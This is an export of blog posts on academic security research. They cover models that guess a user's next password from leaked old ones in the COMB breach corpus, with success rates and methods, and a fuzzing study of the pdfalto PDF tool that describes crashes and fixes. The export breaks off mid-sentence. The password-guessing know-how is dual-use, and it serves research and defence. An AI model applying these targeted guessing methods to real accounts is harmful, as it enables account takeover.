[{"content":"1. Recap – From PASSLLM Back to Semantics In the last post, From COMB to PASSLLM: Setting a Semantic Baseline, I plugged my cleaned COMB dataset into PASSLLM’s reuse pipeline and asked a simple question:\nIf I give a model one of your old passwords, how often can it guess the next one within 1,000 tries?\nPASSLLM gave me a surprisingly strong baseline on semantic-looking reuse pairs, even after I aggressively removed email-based and name-based passwords.\nBut that work was still very black-box LLM-ish. For the next step, I wanted something more interpretable:\nCan we explicitly model how the structure and semantics of passwords change between pw₁ and pw₂? And can we do it in a way that feels closer to Veras et al.’s classic “Semantic Patterns of Passwords” That’s what this post is about.\n2. Adapting Veras’ Semantic Grammar to Password Reuse Veras et al. built a semantic PCFG trained on RockYou: segment passwords into chunks, POS-tag them, map content words to WordNet synsets, then learn a grammar over syntactic and semantic tags. Their guess generator is fully unconditional: it just outputs passwords in decreasing probability order.\nMy scenario is different:\nGiven one of your passwords (pw₁), I want to predict your next password (pw₂).\nSo instead of a global PCFG over single passwords, I built a conditional model over password pairs, while reusing as much of the Veras pipeline as possible:\nSame segmentation and POS-tagging logic. Same WordNet-based semantic abstraction with tree-cut models. But a different final layer:\nI explicitly learn $$P(\\text{pw2_pattern} \\mid \\text{pw1_pattern})$$\nand a tag lexicon $$P(w \\mid t)$$, then combine them to generate guesses. In other words, I kept their semantic eyes, but gave them a reuse brain.\n3. Dataset \u0026amp; Pattern Statistics at a Glance The data is a user-level split of email–password pairs, where each row is a sister pair (pw₁, pw₂). I keep emails only to separate users; all evaluation is done on passwords.\n3.1 Train / Test split I sampled:\n83,390 password pairs for training 20,939 password pairs for testing with no overlap in the email field between the two splits.\nTrain: 83,390 pairs Test : 20,939 pairs (no shared emails) 3.2 POS-only vs Semantic patterns For each password, I extract a structural pattern:\nPOS-only: tags like (nn1)(number2) Semantic: tags like (nn1_physical_entity.n.01)(number2) Here is what the pattern space looks like:\nsetting split #pairs #unique pw1_pattern #unique pw2_pattern POS-only train 83,390 12,471 12,289 POS-only test 20,939 4,478 4,458 Semantic train 83,390 14,884 14,604 Semantic test 20,939 5,291 5,229 Semantic tagging gives me a slightly larger and more fine-grained pattern space: more unique patterns per split, but not explosively so. That’s the first sign that semantic categories are adding detail without completely fragmenting the data.\n4. What Do Users Actually Reuse? Pattern Transitions At the heart of this experiment is the pattern-transition model:\nFor each sister pair (pw₁, pw₂), treat $pw₁_{pattern} = s$, $pw₂_{pattern} = r$, and learn how often r follows s.\nSome of the most frequent transitions in the POS-only setting are delightfully boring:\n(nn1)(number2) → (nn1)(number2) (nn1) → (nn1) (np1) → (np1) In other words, a lot of users simply keep the same structural recipe: “word + two digits” stays “word + two digits”, even when the actual word or digits change.\nIn the semantic setting, you see the same idea but with concepts:\n(nn1_physical_entity.n.01)(number2) → (nn1_physical_entity.n.01)(number2) (np1_unk) → (np1_unk) Here, “some physical thing + year-like number” often stays exactly that, even if the “thing” or the year changes. Conceptually, people tend to stick to the same template.\n5. How Wild Is the Test Set? Unseen Patterns A natural question is: how many pw₁/pw₂ patterns at test time have never been seen in training?\nPOS-only: 2,215 unseen pw₁ patterns (~3,028 pairs) 2,219 unseen pw₂ patterns (~2,968 pairs) Semantic: 2,710 unseen pw₁ patterns (~3,608 pairs) 2,716 unseen pw₂ patterns (~3,538 pairs) So roughly a third of the test pairs involve at least one pattern that did not appear in training. That’s why I need a backoff strategy (edit-distance nearest neighbour) for pw₁ patterns that never show up during training.\nI’ll come back to that when discussing the model design.\n6. Can We Actually Guess pw₂? Hit@K Results With all the pieces in place, I ran a reuse-guessing experiment:\nFor each test user, I give the model pw₁ and allow up to 1,000 guesses for pw₂. I evaluate both: Hit@K on the exact pw₂, and Hit@K on the pw₂ pattern (ignoring the concrete tokens). Here is the summary (POS-only vs Semantic):\nK Hit@K pw2 (POS) Hit@K pw2 (Semantic) Hit@K pattern (POS) Hit@K pattern (Semantic) 1 0.0044 0.0296 0.2704 0.2386 10 0.0872 0.1074 0.4851 0.4522 100 0.1352 0.1518 0.4851 0.4522 1000 0.2054 0.2230 0.4851 0.4522 A few observations:\nSemantic beats POS-only on pw₂ at every K: even a modest semantic signal helps guide guesses. Pattern Hit@K saturates quickly (after K=10). This is by design: for each pw₁ pattern, I only enumerate the top 5 pw₂ patterns, and the pattern-level Hit@K is computed over unique patterns. Once K is larger than 5, you don’t see new patterns—only more token variations of the same patterns. In other words, the model is quite good at guessing the structural change from pw₁ to pw₂, and the hard part is filling in the exact tokens.\n","permalink":"https://blacksugar.top/posts/clean_the_chaos_3/","summary":"\u003ch2 id=\"1-recap--from-passllm-back-to-semantics\"\u003e1. Recap – From PASSLLM Back to Semantics\u003c/h2\u003e\n\u003cp\u003eIn the last post, \u003cem\u003eFrom COMB to PASSLLM: Setting a Semantic Baseline\u003c/em\u003e, I plugged my cleaned COMB dataset into PASSLLM’s reuse pipeline and asked a simple question:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIf I give a model one of your old passwords, how often can it guess the next one within 1,000 tries?\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003ePASSLLM gave me a surprisingly strong baseline on \u003cem\u003esemantic-looking\u003c/em\u003e reuse pairs, even after I aggressively removed email-based and name-based passwords.\u003c/p\u003e","title":"「古度」From Veras to Password Reuse: Semantic Patterns of Sister Passwords"},{"content":"0. Recap – From Raw Breaches to Semantic Password Pairs In the previous post, “Cleaning the Chaos”, I wrote about turning the COMB mega-breach into something that actually reflects human semantics instead of just random junk strings. The goal was simple: if we want to study whether passwords like\ndarkness → midnight summer19 → sunshine20 are related at a conceptual level, then our dataset needs to be full of these “semantic siblings,” not hashes, email copies, or unreadable gibberish.\nThat first phase gave me a cleaned pool of password pairs where:\nEmails and trivial email-based passwords were removed. Name-like passwords, especially those mirroring the local-part of the email, were heavily filtered out. Obvious gibberish, Base64 / hash-like strings, and keyboard walks were pruned. I focused on English-like strings with plausible semantics, discarding Chinese pinyin and other non-target language material. That post ended at the data layer. In this phase, I finally plugged that cleaned COMB data into PASSLLM and asked the natural next question:\nIf I train a reuse-based PASSLLM model only on “semantic-looking” password pairs, how well does it actually guess?\n1. Reuse-Based Guessing in PASSLLM (Paper Recap) PASSLLM is a framework that adapts LLMs (e.g., Mistral, Qwen2.5) to password guessing using LoRA fine-tuning and custom generation algorithms. It covers four scenarios:\nTrawling (Rockyou-style) PII-based targeted guessing Reuse-based targeted guessing (sister passwords) Multi-source (PII + reuse) guessing For reuse-based attacks, the paper defines several COMB-based scenarios (Table 5):\nCOMB (pw₁ → pw₂) – one sister password, one target.\nCOMB (pw₁, pw₂ → pw₃) – two sisters, one target.\nCOMB (pw₁…pwₙ → pwₙ₊₁, n∈[3,7]) – full multi-password reuse.\nAll are trained with 100k samples and tested on 10k samples, with a maximum of 1,000 guesses per user.\nKey takeaways from the reuse section:\nPASSLLM-II beats all reuse models (Pass2Edit, Pass2Path, PointerGuess, TarGuess-II, PassBERT) within 1,000 guesses. In the single-password COMB scenario, PASSLLM-II improves over Pass2Edit by 8.27–9.66 percentage points within 1,000 guesses. In multi-password (≥3) scenarios, PASSLLM-II reaches 36.63% success within 10³ guesses (with target ≠ any sister password). On top of that, they distill the 7B Mistral-based model into Qwen2.5-0.5B, forming PASSLLM-II-d. Distillation gives:\n4–6× speedup for targeted generation. Almost identical success curves in reuse scenarios (e.g., 126→CSDN). In other words: a compact 0.5B model can still behave like a serious password cracker—if it’s trained on the right data.\n2. My Setup – comb_qwen0.5b on COMB-Clean For this phase, I used the released comb_qwen0.5b checkpoint (PASSLLM’s distilled Qwen2.5-0.5B model for reuse) as the base, and then applied LoRA fine-tuning on my own cleaned COMB reuse dataset.\nConcretely:\nBase model: comb_qwen0.5b (Qwen2.5-0.5B, PASSLLM-II-d style). Scenario: reuse-based targeted guessing, using (sister password → target password) pairs from COMB. Training set: ~500,000 cleaned semantic pairs (my COMB-clean). Validation sets: 5k split: 5,000 pairs. 25k split: 25,000 pairs. Generation and evaluation followed the PASSLLM toolchain. After running the guessing pipeline, I used a shell script to aggregate, for each cracked account, the number of guesses needed (capped at 1,000) and reports:\nMinimum / Maximum guesses among successes. Median / Average guesses. Count = number of accounts successfully cracked within 1,000 guesses. To turn Count into a success rate, I divide it by the total number of samples in the split (5,000 or 25,000).\n3. Results on COMB-Clean 3.1 5k Validation Split Output:\nMinimum: 2 Maximum: 999 Median: 3 Average: 69.9786756453423 Count: 1782 Interpretation (assuming 5,000 samples):\nSuccesses: 1,782 cracked accounts. Success rate: 1,782 / 5,000 ≈ 35.6% within 1,000 guesses. Guess distribution: Median = 3 ⇒ Half of the cracked accounts are guessed in 3 guesses or fewer. Mean ≈ 70 ⇒ There’s a long tail: some passwords only appear late in the 1,000-guess budget. 3.2 25k Validation Split Output:\nMinimum: 2 Maximum: 1000 Median: 2 Average: 60.89439332334689 Count: 9346 Assuming 25,000 samples:\nSuccesses: 9,346 cracked accounts. Success rate: 9,346 / 25,000 ≈ 37.4% within 1,000 guesses. Guess distribution: Median = 2 → for those that are cracked, PASSLLM often hits them very early. Average ≈ 61 → again, a long tail of more difficult cases. Now the interesting part:\n5k split: ~35.6% success. 25k split: ~37.4% success. The performance is very stable across the two splits and numerically very close to the ~36.6% reported in the PASSLLM paper for COMB multi-password reuse. This is already a good sign that:\nThe distilled 0.5B Qwen model plus LoRA fine-tuning is strong enough. My cleaned COMB dataset, although semantically filtered, still captures a substantial amount of realistic reuse behavior. 4. How My Dataset Differs from PASSLLM’s COMB Even though the success rates look close, the datasets behind them are not the same.\n4.1 PASSLLM’s Philosophy: “Use All Reuse Behavior” In the paper, the authors explicitly point out that filtering training pairs based on cosine similarity (as done in Pass2Edit) is problematic because it removes legitimate reuse pairs that just happen to be embedding-distant (for example johndoe vs JOHNDOE). PASSLLM-II avoids this by training on the full reuse dataset without filtering.\nThis implies their COMB reuse training and test sets still contain:\nName-based passwords. Email-local-part reuse (alice1989 → alice1989!). Very small-edit patterns (pass123 → pass1234). Many structurally trivial yet security-relevant transformations. For each reuse scenario in Table 5, they fix the training size at 100k and use 10k samples for testing, noting that success rates converge beyond ~10k test entries.\n4.2 My Philosophy: “Emphasize Semantics, Not Trivial Reuse” My COMB-clean dataset does something quite different:\nAggressively removed person names that resemble raw names or clearly mirror the email local-part (johnsmith, Coursesauskas, etc.).\nRemoved email-like and email-derived passwords, such as:\n187@mail.ru → 187@mail.ru:0602 johndoe@example.com → johndoe@example.com;06026 Discarded sequences that look like random gibberish, especially where both sides of the pair are high-entropy strings like:\nQJbVJoWUwOCqBEm0 → ZGELiovZYWaeSqrfCUQ 0q00q0xpkm0oyco → 4q3xpkm2oyco Filtered out Chinese pinyin in order to concentrate on English-like strings, since the next phase of my work will use English-oriented semantic embeddings.\nThe result is a reuse dataset that:\nDownplays trivial reuse patterns (copying, local-part reuse, very small edits). Puts more emphasis on “semantic-looking” transformations where at least one side contains English-like tokens with potential conceptual meaning. So while the numerical success rates (~36–37%) are close to PASSLLM’s COMB multi-password results, the distribution of pairs is different: mine is intentionally “cleaner,” but it’s not a strict subset of the paper’s COMB scenarios; it’s a filtered, reweighted view of reuse.\n5. Comparing My Baseline to the Paper Putting everything side by side:\nModel family\nPaper: PASSLLM-II with a 7B Mistral teacher; evaluation often reports the teacher but also distills to Qwen2.5-0.5B (PASSLLM-d) for efficiency. Me: start from comb_qwen0.5b (Qwen2.5-0.5B distilled student), then apply LoRA fine-tuning on COMB-clean. Training data\nPaper (reuse, COMB): 100k unfiltered COMB pairs per scenario; full spectrum of reuse patterns. Me: ~500k heavily filtered pairs focusing on semantic plausibility, excluding many names, email copies, gibberish, and pinyin. Test data\nPaper: 10k COMB test pairs (no semantic filtering, just standard cleaning of non-ASCII and overly long strings). Me: 5k and 25k splits drawn from COMB-clean, where non-semantic and trivial reuse cases are underrepresented by design. Success rates within 1,000 guesses\nPaper (COMB multi-password reuse, ≥3 sisters): 36.63%. Given that:\nI’m only using the 0.5B distilled Qwen model, not the 7B Mistral teacher. My dataset prunes away a lot of “cheap” reuse shortcuts like names and email-based passwords. I interpret this as:\nPASSLLM’s reuse architecture is surprisingly robust: it still performs strongly on a “semantic-leaning” subset of COMB. My cleaned dataset is not artificially impossible; it still retains many realistic reuse patterns—even after pruning out some of the obvious quiz answers. This makes the current model a solid and realistic baseline for the next phase of my project.\n6. What This Baseline Means for the Next Steps This experiment is the bridge between my two earlier directions:\nPhase 1: make COMB usable for semantic analysis (cleaning out noise, names, junk). Phase 2 (this post): plug the cleaned data into PASSLLM’s reuse pipeline and see how a distilled 0.5B reuse model behaves. Now I have:\nA quantitative baseline for reuse on semantic-leaning COMB: ~36–37% success within 1,000 guesses on 5k and 25k splits. A controlled difference from the original PASSLLM setup: Same COMB origin, but filtered to emphasize English semantics and de-emphasize trivial reuse. For the next step, I’m going back to semantics, following the pipeline from “On the Semantic Patterns of Passwords and their Security Impact” by Veras et al.\nThe plan is:\nSemantic annotation of each password\nSegment passwords (ilovedogs2024 → i | love | dogs | 2024). POS-tag segments and map content words to WordNet synsets (e.g., dog.n.01, love.n.01), then generalize to higher-level categories (animal, emotion, event, etc.). Analyze “synset migration” between sister passwords\nFor each pair (old_password, new_password), compare their synset/category sequences. Count transitions like dog.n.01 → love.n.01 or cat.n.01 → birthday.n.02, and build a transition matrix over categories (e.g., animal → emotion, pet → event). Use these patterns to guide new models\nFirst, study which concepts tend to stay stable and which tend to drift when users change passwords. Then, design a password model (or a re-ranking layer on top of PASSLLM) that explicitly uses these synset transition patterns as a semantic prior. In short, instead of only asking “can we guess the next password?”, the next phase asks “how do concepts move when users change passwords?” and tries to turn that into a model.\n","permalink":"https://blacksugar.top/posts/clean_the_chaos_2/","summary":"\u003ch2 id=\"0-recap--from-raw-breaches-to-semantic-password-pairs\"\u003e0. Recap – From Raw Breaches to Semantic Password Pairs\u003c/h2\u003e\n\u003cp\u003eIn the previous post, \u003cstrong\u003e“Cleaning the Chaos”\u003c/strong\u003e, I wrote about turning the COMB mega-breach into something that actually reflects \u003cem\u003ehuman semantics\u003c/em\u003e instead of just random junk strings. The goal was simple: if we want to study whether passwords like\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edarkness → midnight\nsummer19 → sunshine20\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eare related at a \u003cem\u003econceptual\u003c/em\u003e level, then our dataset needs to be full of these “semantic siblings,” not hashes, email copies, or unreadable gibberish.\u003c/p\u003e","title":"「古度」From COMB to PASSLLM: Setting a Semantic Baseline"},{"content":"0. Internship Background During my research internship at the Digital Security Group (Radboud University), I worked on a project titled “Semantic-Aware Password Guessing”, under the supervision of Xavier de Carné de Carnavalet.\nThe goal of this project was to explore whether semantic similarity—the kind of conceptual relation humans perceive between words like darkness and midnight—could be applied to model how users create new passwords.\nExisting password guessing models such as Pass2Path or Pass2Edit mainly rely on edit distance and structural transformations. They perform well when users make small tweaks, like password1 → password2, but fail when users create new passwords that carry similar meanings but very different characters.\nMy task was to build the foundation for a model that could recognize and learn from these semantic transformations. But before I could train anything meaningful, I needed a clean dataset that truly reflected human password semantics—and that’s where the long journey of data cleaning began.\n1. Starting Point: The COMB Dataset The COMB dataset is a monstrous collection of over 3 billion email-password pairs aggregated from hundreds of breaches. It contains everything—from real user passwords to garbage strings, hashes, and even website footers that accidentally got scraped in.\nBefore any semantic modeling could happen, I needed a way to isolate real, human-like passwords and discard noise. My goal wasn’t just to clean the data but to make sure what remained could reveal meaningful semantic relationships between users’ passwords.\n2. Phase One – Filtering Out the Obvious Junk The first stage was about basic hygiene. I started by parsing raw text lines and splitting them into email : password pairs. Then came a series of lightweight sanity checks:\nValid email check: reject anything without a proper structure (name@domain.tld), or domains with weird patterns. Password normalization: keep only printable ASCII, strip control characters. Minimum standards: At least 4 characters long Reasonable mix of letters and digits Not dominated by symbols or random gibberish Not too long (I capped at 30 characters) I also computed simple heuristics like Shannon entropy, vowel ratio, and symbol ratio to remove passwords that were clearly machine-generated or meaningless.\nThis step alone reduced the dataset from billions of entries to a much more manageable pool of plausible passwords.\n3. Phase Two – Human-Like Structure Filters Once the basic cleaning was done, I moved on to detecting passwords that looked human but weren’t useful for semantic study. These include things like:\nPerson-name-like passwords, e.g. johnsmith, maria1988, or alex_in_love. I used contextual leet normalization (p@ssw0rd → password) to handle creative spellings. If a password resembled a name and matched the local part of the user’s email, it was excluded. Email reuse or mirrored passwords, such as johndoe123 when the email was johndoe@gmail.com. These don’t reflect “semantic transformation,” just trivial reuse. Gibberish concatenations, e.g. asdfqwerzxcvbn or long repeating units like abcabcabcabc. I detected those through repeated substring patterns and long consonant runs. Each rule was designed to remove passwords that would otherwise bias the semantic analysis toward structural or personal reuse, instead of genuine conceptual variation.\n4. Phase Three – Semantic Pair Discovery With clean user-level data (each email mapped to multiple passwords), I could now look for semantic relationships between a user’s old and new passwords.\nMy idea was simple: passwords that mean similar things, even if they look completely different, should be considered related. For example:\ndarkness → midnight angel123 → heaven22 summer19 → sunshine20 To capture this, I used sentence embeddings to map passwords into a shared vector space, where semantic closeness could be measured by cosine similarity. However, to avoid being tricked by small structural overlaps, I combined semantic similarity with edit distance constraints—so that only truly “meaningful” connections were kept, not trivial typos or copies.\nThe result was a set of password pairs that were semantically linked but often had large character differences—a perfect foundation for training or evaluating semantic-aware password models.\n5. Phase Four – Sanity and Robustness Checks After generating semantic pairs, I still had to remove edge cases that slipped through:\nReverse variants, like abcd vs. dcba Hash-like or Base64 strings, e.g. 5f4dcc3b5aa765d61d8327deb882cf99 Double nonsense pairs, where both sides were unreadable noise Finally, I recalculated similarity in a digit-robust way: by testing both digit-removed and digit-masked versions (replacing numbers with [NUM]). This allowed me to identify pairs like love123 ↔ love2024 as similar, even though the numbers changed.\n","permalink":"https://blacksugar.top/posts/clean_the_chaos/","summary":"\u003ch2 id=\"0-internship-background\"\u003e0. Internship Background\u003c/h2\u003e\n\u003cp\u003eDuring my research internship at the Digital Security Group (Radboud University), I worked on a project titled “Semantic-Aware Password Guessing”, under the supervision of \u003ca href=\"https://xavier2dc.fr/\"\u003e\u003cstrong\u003eXavier de Carné de Carnavalet\u003c/strong\u003e\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThe goal of this project was to explore whether semantic similarity—the kind of conceptual relation humans perceive between words like darkness and midnight—could be applied to model how users create new passwords.\u003c/p\u003e\n\u003cp\u003eExisting password guessing models such as Pass2Path or Pass2Edit mainly rely on edit distance and structural transformations. They perform well when users make small tweaks, like password1 → password2, but fail when users create new passwords that carry similar meanings but very different characters.\u003c/p\u003e","title":"「古度」Cleaning the Chaos"},{"content":"As part of the Software Security course at Radboud University, I conducted a fuzzing project targeting pdfalto, a command-line tool that converts PDF files into structured XML representations (ALTO format). The tool is written in C++ and relies heavily on the xpdf library library, which is also implemented in C++.\nWe chose pdfalto because the PDF format is notoriously complex and error-prone, and the project seemed to have practical relevance — used in real-world contexts but not widely tested with fuzzing tools. The goal was to explore the effectiveness of several fuzzers and to identify potential bugs or vulnerabilities.\nThrough the experiments, several real issues were discovered, including segmentation faults, memory allocation errors, and a heap buffer overflow, most of which originated from the xpdf library.\nExperiments We performed 6 experiments in total on a remote machine running Ubuntu 22.04. We used an input corpus consisting of 43 pdf files, and 7 non-pdf files. The pdf files were specifically selected to provoke interesting behaviour (edge cases). For example, it included pdfs from many different typesetters, different image formats, tables, etc.\nThe results are summarized in Table 1. AFL was the only tool that found serious problems with a total of 114 crashes and 51 hangs (#1). We also ran AFL with ASan enabled (#3) which also found a crash. Furthermore, we tried Zzuf with and without ASan enabled, but no crashes or hangs were found (#2 and #5). Similarly, we did not find any crashes or hangs using Radamsa (#6). We also tried running HonggFuzz (#4). Even though we left it running for over 6 days by accident, it did not find any crashes or hangs.\nBesides these experiments. We also ran experiments using AFL and HonggFuzz using a single input file for several hours (we did not record the exact time), but we found no crashes or hangs with these experiments.\nIt must also be noted that AFL did not report any errors. This is somewhat strange since we observed manually that AFL generated inputs that generated errors in pdfalto.\nID_experiment Tool Time Number of test cases Issues found #1 AFL 12hr 12k no errors, 114 crashes, 51 hangs #3 AFL + ASan 3hr 4k no errors, 1 crashes, no hangs #2 zzuf 15min 5k 2.319k errors, no crashes, no hangs #5 zzuf + ASan 15min 5k 2.319k errors, no crashes, no hangs #6 Radamsa 32min 5k 231k errors, no crashes, no hangs #4 HonggFuzz 6d 19hr 32min 135,373k no errors, no crashes, no hangs Table 1: Experiments performed, along with the results.\nEvery fuzzer (except HonggFuzz) reported a lot of errors that were thrown by the xpdf library. Most of these fall into one of the following three categories.\nConfig Errors: \u0026ldquo;Unknown config file command \u0026lsquo;cMipDir\u0026rsquo;\u0026rdquo; or \u0026ldquo;Bad \u0026lsquo;cMapDir\u0026rsquo; config file command\u0026rdquo; Syntax Errors: \u0026ldquo;Illegal character \u0026lsquo;{\u0026rsquo;,\u0026rdquo; \u0026ldquo;Illegal character in hex string,\u0026rdquo; and \u0026ldquo;Dictionary key must be a name object\u0026rdquo; Syntax Warnings: \u0026ldquo;PDF file is damaged - attempting to reconstruct xref table\u0026rdquo; These errors indicate that the developers of xpdf designed the library with erroneous input in mind. On some inputs, pdfalto would exit gracefully after throwing one of these errors, but we also found cases where one or multiple of these errors were thrown first, and pdfalto subsequently crashed.\nFixing the bugs found by AFL (Experiment #1 and #3) AFL proved to be greatly effective at finding crashes in pdfalto. We decided to dedicate some time to diagnosing what bugs it found and even implemented ad-hoc fixes for most of the crashes that it found.\nIt turns out that all the crashes that we found can be put into just a few categories. They are all caused by the xpdf library, which is used within pdfalto. We made heavy use of GDB in this debugging process. A repo with our bugfixes can be found here. Our adjustments can be found easily by searching the repo for // START FIX.\nSegmentation fault in XRef::fetch In line 1155 of XRef.cc, a function Object *XRef::fetch(int num, int gen, Object *obj, int recursion) is called. This leads to a segmentation fault on certain inputs. The program always seems to say Syntax Error (some number): Dictionary key must be a name object several times before this crash.\nObject *XRef::fetch(int num, int gen, Object *obj, int recursion) { XRefEntry *e; Parser *parser; Object obj1, obj2, obj3; XRefCacheEntry tmp; int i, j; .... } After some inspection in GDB, we found out that this bug is caused by an infinite recursion in the methods AcroForm::scanField in AcroFrom.cc, int Catalog::countPageTree in Catalog.cc, or void Catalog::readPageLabelTree2in Catalog.cc. Eventually, the program runs out of memory because of this infinite recursion and it throws a segmentation fault when trying to fetch a new object.\nIn each case, we fixed this by introducing a new method called \u0026lt;methodname\u0026gt;Safe which takes as an extra argument an integer with the recursion level. Then before making a recursive call, we increment this recursion level, and if it exceeds some limit, we simply return instead of doing anything. This is quite a crude fix, but our modified pdfalto no longer crashes on a lot of outputs that it crashed on before.\nFrom googling this segmentation fault, we found out that somebody has already fuzzed xpdf (but not pdfalto). In this 2023 forum post, the maintaner of xpdf says the following:\n\u0026ldquo;This problem is due to an object loop in the PDF structure. I\u0026rsquo;m working on an improved loop detector for Xpdf 5.\u0026rdquo;\nIt is good to see that the developer is already addressing this problem, but xpdf 4 is still the latest version at this moment.\nstd::bad_alloc() This error is can be caused by trying to allocate too much memory for an image that is too big. In this case, it stems from line 7774 in XmlAltoOutputDev.cc: unsigned char *data = new unsigned char[width * height * 3];. We had a test case where the size becomes 18446744073119616992, which is obviously far too much memory to allocate. We fixed this bug by imposing a hard limit on the allocated memory size at this particular line. If the requested memory exceeds this limit, we simply exit with code -1.\nAnother error in line 7680 is analogous and was also fixed the same way.\nThe developper of xpdf has labeled this as intended behaviour, but we disagree. The program should check the memory limit and exit gracefully if it is exceeded. A better, more permanent way to fix this error is to assess at runtime if enough stack memory is available to declare the array and exit with a sensible error message if it is exceeded.\nGMemException GMemException (General Memory Exception) is an Exception implemented within the xpdf library that is thrown if something is wrong with the memory during execution. Quite a few of our test cases that crashed resulted in such a GMemException.\nThe developper of xpdf has confirmed that GMemException is intended behaviour in many cases. Therefore, we think that pdfalto should be responsible for catching the error message. We implemented this by simply putting the code that calls the xpdf library in a try-catch block, and exiting gracefully if GMemException is thrown.\nFloating point Exception This crash was caused by line 361 in Stream.cc:\nif (width \u0026gt; INT_MAX / nComps || nVals \u0026gt; (INT_MAX - 7) / nBits)\nIt turns out that this was actually caused by a zero division error when nComps was 0. We fixed it by checking if nComps or nBits is zero on runtime.\nif ( nComps != 0 \u0026amp;\u0026amp; nBits != 0 \u0026amp;\u0026amp; (width \u0026gt; INT_MAX / nComps || nVals \u0026gt; (INT_MAX - 7) / nBits))\nA (potential) crash found by experiment #3 (AFL + ASAN) - Heap Buffer Overflow Unlike the bugs that were found in experiment #1, this bug happens in pdfalto itself, not in the xpdf library. While executing AFL + ASan, ASan reported a heap-buffer-overflow. The error occurs in pdfalto.cc in the following section:\nchar *dirname; dirname = (char*)malloc(dirname_length + 1); strncat(dirname, thePath, dirname_length); dirname[dirname_length] = \u0026#39;\\0\u0026#39;; The issue is that dirname is allocated a length of dirname_length + 1, but strncat is used immediately without initializing dirname. strncat expects dirname to contain a null terminator to properly append content, but since dirname is uninitialized, this can lead to undefined behavior, including buffer overflows.\nWe fixed this crash by initializing dirname to an empty string after allocation, then use strncpy instead of strncat since we’re just copying thePath contents into dirname:\ndirname = (char*)malloc(dirname_length + 1); dirname[0] = \u0026#39;\\0\u0026#39;; // Initialize to an empty string strncpy(dirname, thePath, dirname_length); dirname[dirname_length] = \u0026#39;\\0\u0026#39;; // Ensure null termination HonggFuzz (Experiment #4) Concerning experiment #4 with HonggFuzz, the results were unsatisfactory. No notable crashes, timeouts or errors were observed during the experiment. The fuzzer maintained an average processing speed of 229 test cases per second, demonstrating high throughput efficiency. However, branch and edge coverage remained stationary at 0%, indicating that the fuzzer was unable to explore deeper execution paths within pdfalto. This lack of exploration is likely due to insufficient instrumentation or limited code paths triggered by the initial inputs.\nThe absence of new results raises important questions about the compatibility of HonggFuzz with this specific application and its dependencies. It suggests that the fuzzer might not be suitable for discovering vulnerabilities in pdfalto\u0026rsquo;s execution model, or that the input space had already been sufficiently exhausted during previous fuzzing campaigns. Alternatively, it could indicate pdfalto\u0026rsquo;s robustness under the specific test conditions, although this conclusion is uncertain given the tool\u0026rsquo;s apparent inability to expand code coverage.\nOverall, HonggFuzz proved to be a high-performance tool in terms of test case generation but failed to deliver actionable insights for this particular case study. Further experiments with refined configurations or additional instrumentation might be required to fully evaluate its potential.\nZzuf (Experiment #2 and #5) For experiments #2 and #5, we systematically varied the mutation rates from 1% to 10% in increments, using a script to apply Zzuf specifically to all PDF files. The mutation rates determined the proportion of bits in the PDF data that were randomly flipped, with lower rates introducing minimal changes and higher rates inducing more extensive mutations. This approach was designed to test the resilience of the PDF processing applications across a spectrum of input perturbations, ensuring a comprehensive evaluation of their robustness under different levels of data corruption.\nWhen we ran Zzuf, it reported a large number of syntax errors for the input PDFs and quickly terminated, unlike AFL or HonggFuzz, which continued running. This is the reason why the running time on Zzuf is relatively short.\nFigure 1: Example output of errors thrown by Zzuf\nThe impact of mutation rates appears to be quite limited based on the results.\nWhile Zzuf found no direct crashes, it reported 2,319k syntax-related and configuration errors. These included the aforementioned \u0026ldquo;Config Error\u0026rdquo; and \u0026ldquo;Syntax Error\u0026rdquo; messages, indicating flaws in input parsing but not resulting in fatal outcomes. Error rates for Zzuf were high, approximately 463.8 errors per thousand test cases.\nRadamsa (Experiment #6) The experiment aimed to evaluate the robustness of pdfalto when processing mutated PDF files generated via Radamsa. The goal was to identify syntax errors, unexpected behavior, or crashes during the parsing of malformed inputs. Observed Results include Syntax Errors, including the following syntax problems:\nErrors Reading Internal Structures Invalid Characters and Unknown Operators Page Hierarchy Issues Much like Zzuf, Radamsa quickly terminated after discovering a large number of syntax errors, with very short runtime durations.\nWhile Radamsa did not find any crashes, it found many of the aforementioned errors and warnings. In particular, it did find one very interesting error message: Command Line Error: Incorrect password (see Figure 2). Apparently Radamsa fed a password-protected pdf to pdfalto. This makes sense since there is an encrypted pdf file in our corpus.\nFigure 2: Password error found by Radamsa\nRadamsa effectively generated a number of malformed PDF files, similar to Zzuf, testing the parsing limits of pdfalto. Although no direct crashes were observed, serious syntax errors prevented some files from being fully processed. This highlights areas where the PDF parser can be improved to increase its resilience against corrupted input.\nReflection Effectiveness of the fuzzers For pdfalto, the only tool that found crashing inputs was AFL. It found an impressive 114 crashes and 51 hangs in 12 hours. We were also able to detect a potential heap-buffer overflow using AFL + ASan. HonggFuzz found nothing despite running for 6 days.\nUnfortunately, Zzuf and Radamsa did not find a lot of interesting bugs due to the aforementioned early termination, but they did find an impressive amount of errors in a short time. We think that given enough time, they might have found some of the same flaws that AFL found.\nWe can conclude that out of the tools that we tried, AFL is the most effective for pdfalto.\nInstrumentation-based and mutation-based Generally, instrumentation-based fuzzers are considered more effective at finding complex bugs while mutation-based fuzzers are considered faster. Our results seem to support this: Instrumentation-based AFL found a lot of interesting flaws in the xpdf library, while mutation-based fuzzers Zzuf and Radamsa found a lot of errors in a short time. However, after a while, the newly reported issues were largely repetitive of the existing ones, with no new types of issues emerging.\nThis highlights the capability of instrumentation-based fuzzers to find critical execution-level issues and the ability of basic fuzzers to expose superficial input-related flaws without deeper crashes.\nComparison of mutation-based fuzzers In the presence of identical initial inputs, Zzuf and Radamsa showed overlapping but distinct behaviour. Both tools detected syntax errors and parsing problems, but often manifested themselves in different ways. For example, while Zzuf generated a ‘Config Error’ with malformed configuration commands, Radamsa produced ‘Incorrect Password’ errors.\nThe main difference is Radamsa\u0026rsquo;s wider range of mutations produced more different types of malformed input than Zzuf, making it slightly better for testing the resilience of pdfalto\u0026rsquo;s parsing mechanisms. However, neither tool discovered execution faults or deep crashes, which were only revealed by instrumentation-based fuzzer AFL.\nEffectiveness of Longer Fuzzing vs. Larger Corpus HonggFuzz ran for over six days, generating 135 million test instances, but failed to discover any vulnerabilities due to poor branch and edge coverage. This suggests that simply running fuzzers for extended periods does not necessarily improve results if inputs fail to 